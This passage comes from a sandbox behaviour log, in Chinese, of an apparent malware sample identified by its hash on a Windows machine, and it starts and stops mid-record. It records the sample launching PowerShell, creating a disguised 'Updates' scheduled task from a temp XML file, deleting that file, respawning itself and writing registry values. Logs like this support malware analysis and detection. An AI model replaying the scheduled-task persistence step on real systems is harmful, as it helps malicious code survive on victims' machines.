Files\WindowsApps\Microsoft.LanguageExperiencePackzh-CN_17763.31.114.0_neutral__8wekyb3d8bbwe\Windows\System32\zh-CN\crypt32.dll.mui, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Windows\SysWOW64\coml2.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Windows\SysWOW64\wshext.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:108, 2928, FILE_chmod, C:\Windows\SysWOW64\OpcServices.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:108, 2928, FILE_chmod, C:\Windows\SysWOW64\xmllite.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:232, 2928, FILE_chmod, C:\Windows\SysWOW64\urlmon.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:108, 2928, FILE_chmod, C:\Windows\SysWOW64\tdh.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:232, 2928, FILE_chmod, C:\Windows\SysWOW64\iertutil.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5796, 2928, FILE_chmod, C:\Windows\SysWOW64\uxtheme.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5764, 2928, FILE_chmod, C:\Windows\SysWOW64\secur32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:635, powershell.exe, 5080:5740, 2928, FILE_chmod, C:\Windows\SysWOW64\msisip.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:635, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Numerics.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:635, powershell.exe, 5080:5776, 2928, FILE_chmod, C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0112~31bf3856ad364e35~amd64~~10.0.17763.1.cat, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:635, powershell.exe, 5080:108, 2928, FILE_chmod, C:\Windows\SysWOW64\mintdh.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:635, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Windows\SysWOW64\AppxSip.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:635, powershell.exe, 5080:5744, 2928, FILE_chmod, C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.DirectoryServices.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:635, powershell.exe, 5080:3720, 2928, FILE_chmod, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources\v4.0_4.0.0.0_zh-HANS_b77a5c561934e089\mscorlib.resources.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:635, powershell.exe, 5080:5752, 2928, FILE_chmod, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\pwrshsip.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:635, powershell.exe, 5080:5444, 2928, FILE_chmod, C:\Users\bonelee\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:635, powershell.exe, 5080:5748, 2928, FILE_chmod, C:\Windows\WinSxS\x86_system.transactions_b77a5c561934e089_4.0.15744.161_none_ab0a76020e38cd6d\System.Transactions.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:635, powershell.exe, 5080:5772, 2928, FILE_chmod, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:641, powershell.exe, 5080:5800, 2928, FILE_chmod, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:641, powershell.exe, 5080:252, 2928, FILE_chmod, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:641, powershell.exe, 5080:5736, 2928, FILE_chmod, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation.Resources\v4.0_3.0.0.0_zh-HANS_31bf3856ad364e35\System.Management.Automation.Resources.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:641, powershell.exe, 5080:5820, 2928, FILE_chmod, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:641, powershell.exe, 5080:5756, 2928, FILE_chmod, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:641, powershell.exe, 5080:232, 2928, FILE_chmod, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources\v4.0_3.0.0.0_zh-HANS_31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.Resources.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:672, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, PROC_exec, C:\Windows\SysWOW64\schtasks.exe, target_pid:5176 cmdline:'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bWyPLjwQzmw" /XML "C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp"' , 0x00000000 [操作成功完成。 ], 09:33:16:672, schtasks.exe, 5176:0, 2928, EXEC_create, C:\Windows\SysWOW64\schtasks.exe, parent_pid:2928 cmdline:'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bWyPLjwQzmw" /XML "C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp"' image_base:0x0000000000EE0000 image_size:0x00033000 , 0x00000000 [操作成功完成。 ], 09:33:16:672, powershell.exe, 5080:0, 2928, PROC_exec, C:\Windows\System32\conhost.exe, target_pid:7172 cmdline:'\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1' , 0x00000000 [操作成功完成。 ], 09:33:16:672, powershell.exe, 5080:7324, 2928, REG_setval, HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-2451103786-187343032-3810694054-1000\\Device\HarddiskVolume3\Windows\System32\conhost.exe, type:0x00000003 datalen:24 data:'0E 71 C7 C8 18 DA D9 01 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:16:672, conhost.exe, 7172:0, 2928, EXEC_create, C:\Windows\System32\conhost.exe, parent_pid:5080 cmdline:'\??\C:\Windows\system32\conhost.exe 0x4' image_base:0x00007FF6D5C20000 image_size:0x000D1000 , 0x00000000 [操作成功完成。 ], 09:33:16:672, schtasks.exe, 5176:0, 2928, PROC_exec, C:\Windows\System32\conhost.exe, target_pid:8100 cmdline:'\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1' , 0x00000000 [操作成功完成。 ], 09:33:16:672, schtasks.exe, 5176:8784, 2928, REG_setval, HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-2451103786-187343032-3810694054-1000\\Device\HarddiskVolume3\Windows\System32\conhost.exe, type:0x00000003 datalen:24 data:'0E 71 C7 C8 18 DA D9 01 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:16:672, conhost.exe, 8100:0, 2928, EXEC_create, C:\Windows\System32\conhost.exe, parent_pid:5176 cmdline:'\??\C:\Windows\system32\conhost.exe 0x4' image_base:0x00007FF6D5C20000 image_size:0x000D1000 , 0x00000000 [操作成功完成。 ], 09:33:16:719, conhost.exe, 7172:0, 2928, EXEC_module_load, C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_05b6437c071e554b\comctl32.dll, base:0x00007FFCF2C50000 size:0x00279000 , 0x00000000 [操作成功完成。 ], 09:33:16:741, conhost.exe, 8100:0, 2928, EXEC_module_load, C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_05b6437c071e554b\comctl32.dll, base:0x00007FFCF2C50000 size:0x00279000 , 0x00000000 [操作成功完成。 ], 09:33:16:741, powershell.exe, 5080:7324, 2928, FILE_readdir, C:\Windows\Microsoft.NET\Framework, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:758, powershell.exe, 5080:7324, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:758, powershell.exe, 5080:0, 2928, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\f2d02f64584169cfed0597e2d00f0a67\mscorlib.ni.dll, base:0x000000006A3B0000 size:0x0140E000 , 0x00000000 [操作成功完成。 ], 09:33:16:772, powershell.exe, 5080:7324, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:788, powershell.exe, 5080:7324, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:788, powershell.exe, 5080:7324, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:788, schtasks.exe, 5176:0, 2928, EXEC_destroy, C:\Windows\SysWOW64\schtasks.exe, parent_pid:2928 cmdline:'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bWyPLjwQzmw" /XML "C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp"' , 0x00000000 [操作成功完成。 ], 09:33:16:788, powershell.exe, 5080:7324, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:788, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_remove, C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp, , 0x00000000 [操作成功完成。 ], 09:33:16:804, powershell.exe, 5080:7324, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:804, powershell.exe, 5080:7324, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:804, powershell.exe, 5080:0, 2928, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\System\d06666c43ff6c690db91fd4cde7ddf1c\System.ni.dll, base:0x0000000069950000 size:0x00A55000 , 0x00000000 [操作成功完成。 ], 09:33:16:804, powershell.exe, 5080:0, 2928, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\55a85a201d7cfebdc16d4357e3c4efb2\System.Core.ni.dll, base:0x0000000069130000 size:0x00818000 , 0x00000000 [操作成功完成。 ], 09:33:16:804, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, PROC_exec, C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, target_pid:8812 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' , 0x00000000 [操作成功完成。 ], 09:33:16:804, conhost.exe, 8100:0, 2928, EXEC_destroy, C:\Windows\System32\conhost.exe, parent_pid:5176 cmdline:'\??\C:\Windows\system32\conhost.exe 0x4' , 0x00000000 [操作成功完成。 ], 09:33:16:835, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8812:0, 2928, EXEC_destroy, C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, parent_pid:2928 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' , 0x00000000 [操作成功完成。 ], 09:33:16:835, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, PROC_exec, C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, target_pid:7580 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' , 0x00000000 [操作成功完成。 ], 09:33:16:835, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 7580:0, 2928, EXEC_destroy, C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, parent_pid:2928 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' , 0x00000000 [操作成功完成。 ], 09:33:16:835, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, PROC_exec, C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, target_pid:4964 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' , 0x00000000 [操作成功完成。 ], 09:33:16:835, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, PROC_exec, C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, target_pid:8452 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' , 0x00000000 [操作成功完成。 ], 09:33:16:850, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, PROC_exec, C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, target_pid:8816 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' , 0x00000000 [操作成功完成。 ], 09:33:16:850, RuntimeBroker.exe, 4964:0, 2928, EXEC_destroy, C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, parent_pid:2928 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' , 0x00000000 [操作成功完成。 ], 09:33:16:850, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8452:0, 2928, EXEC_destroy, C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, parent_pid:2928 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' , 0x00000000 [操作成功完成。 ], 09:33:16:850, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:0, 2928, EXEC_create, C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, parent_pid:2928 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' image_base:0x0000000000820000 image_size:0x0008A000 , 0x00000000 [操作成功完成。 ], 09:33:16:866, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, FILE_readdir, C:\Windows\Microsoft.NET\Framework, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:866, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:866, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:0, 2928, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\f2d02f64584169cfed0597e2d00f0a67\mscorlib.ni.dll, base:0x000000006A3B0000 size:0x0140E000 , 0x00000000 [操作成功完成。 ], 09:33:16:866, powershell.exe, 5080:4668, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:882, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:4640, 2928, FILE_touch, C:\Users\bonelee\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe.log, access:0x00120196 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000005 options:0x00000060 , 0x00000000 [操作成功完成。 ], 09:33:16:882, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:4640, 2928, FILE_write, C:\Users\bonelee\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe.log, offset:0x00000000 datalen:0x00000516 , 0x00000000 [操作成功完成。 ], 09:33:16:882, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, FILE_modified, C:\Users\bonelee\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe.log, , 0x00000000 [操作成功完成。 ], 09:33:16:882, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:882, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:0, 2928, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\System\d06666c43ff6c690db91fd4cde7ddf1c\System.ni.dll, base:0x0000000069950000 size:0x00A55000 , 0x00000000 [操作成功完成。 ], 09:33:16:882, powershell.exe, 5080:0, 2928, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\f95c1d21c350fd9102417341a1e75e5b\Microsoft.Management.Infrastructure.ni.dll, base:0x000000006C680000 size:0x00080000 , 0x00000000 [操作成功完成。 ], 09:33:16:882, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:882, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:897, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Notifications\Data\418A073AA3BC3475, type:0x00000003 datalen:114 data:'CB 04 00 00 00 00 00 00 04 00 04 00 01 02 02 00 ' , 0x00000000 [操作成功完成。 ], 09:33:16:917, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:917, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:0, 2928, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\55a85a201d7cfebdc16d4357e3c4efb2\System.Core.ni.dll, base:0x0000000069130000 size:0x00818000 , 0x00000000 [操作成功完成。 ], 09:33:16:929, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, EXEC_destroy, C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, parent_pid:5192 cmdline:'C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe' , 0x00000000 [操作成功完成。 ], 09:33:16:929, powershell.exe, 5080:7324, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:929, powershell.exe, 5080:4668, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:929, powershell.exe, 5080:0, 2928, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\7f615844ab7c9db651cca958c10624f5\System.Xml.ni.dll, base:0x00000000689B0000 size:0x00774000 , 0x00000000 [操作成功完成。 ], 09:33:16:929, powershell.exe, 5080:4668, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:929, powershell.exe, 5080:4668, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:929, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:929, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:0, 2928, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\6b3b4bf6dbe30207f4ef50f235d9a8ab\System.Configuration.ni.dll, base:0x0000000073EC0000 size:0x00106000 , 0x00000000 [操作成功完成。 ], 09:33:16:944, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:944, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:0, 2928, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\7f615844ab7c9db651cca958c10624f5\System.Xml.ni.dll, base:0x00000000689B0000 size:0x00774000 , 0x00000000 [操作成功完成。 ], 09:33:16:944, powershell.exe, 5080:4668, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:944, powershell.exe, 5080:4668, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:960, powershell.exe, 5080:7324, 2928, FILE_touch, C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_qnsb5ven.vxd.ps1, access:0x00120196 alloc_size:0 attrib:0x00000000 share_access:0x00000001 disposition:0x00000005 options:0x00400064 , 0x00000000 [操作成功完成。 ], 09:33:16:960, powershell.exe, 5080:7324, 2928, FILE_write, C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_qnsb5ven.vxd.ps1, offset:0x00000000 datalen:0x0000004D , 0x00000000 [操作成功完成。 ], 09:33:16:960, powershell.exe, 5080:0, 2928, FILE_modified, C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_qnsb5ven.vxd.ps1, , 0x00000000 [操作成功完成。 ], 09:33:16:960, powershell.exe, 5080:7324, 2928, FILE_touch, C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_hfpoh5qd.lbj.psm1, access:0x00120196 alloc_size:0 attrib:0x00000000 share_access:0x00000001 disposition:0x00000005 options:0x00400064 , 0x00000000 [操作成功完成。 ], 09:33:16:976, powershell.exe, 5080:7324, 2928, FILE_write, C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_hfpoh5qd.lbj.psm1, offset:0x00000000 datalen:0x0000004D , 0x00000000 [操作成功完成。 ], 09:33:16:976, powershell.exe, 5080:0, 2928, FILE_modified, C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_hfpoh5qd.lbj.psm1, , 0x00000000 [操作成功完成。 ], 09:33:16:976, powershell.exe, 5080:0, 2928, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\cfaa34000029b18fb89febf12cd0d80c\System.Management.ni.dll, base:0x000000006C730000 size:0x00130000 , 0x00000000 [操作成功完成。 ], 09:33:16:976, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, REG_mkkey, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32, access:0x0002001B , 0x00000000 [操作成功完成。 ], 09:33:16:976, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32\EnableFileTracing, type:0x00000004 datalen:4 data:'00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:16:976, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32\EnableAutoFileTracing, type:0x00000004 datalen:4 data:'00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:16:976, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32\EnableConsoleTracing, type:0x00000004 datalen:4 data:'00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:16:976, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32\FileTracingMask, type:0x00000004 datalen:4 data:'00 00 FF FF ' , 0x00000000 [操作成功完成。 ], 09:33:16:976, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32\ConsoleTracingMask, type:0x00000004 datalen:4 data:'00 00 FF FF ' , 0x00000000 [操作成功完成。 ], 09:33:16:976, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32\MaxFileSize, type:0x00000004 datalen:4 data:'00 00 10 00 ' , 0x00000000 [操作成功完成。 ], 09:33:16:976, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:4912, 2928, REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32\FileDirectory, type:0x00000002 datalen:34 data:'25 77 69 6E 64 69 72 25 5C 74 72 61 63 69 6E 67 ' , 0x00000000 [操作成功完成。 ], 09:33:16:991, powershell.exe, 5080:7324, 2928, FILE_remove, C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_qnsb5ven.vxd.ps1, , 0x00000000 [操作成功完成。 ], 09:33:16:991, powershell.exe, 5080:7324, 2928, FILE_remove, 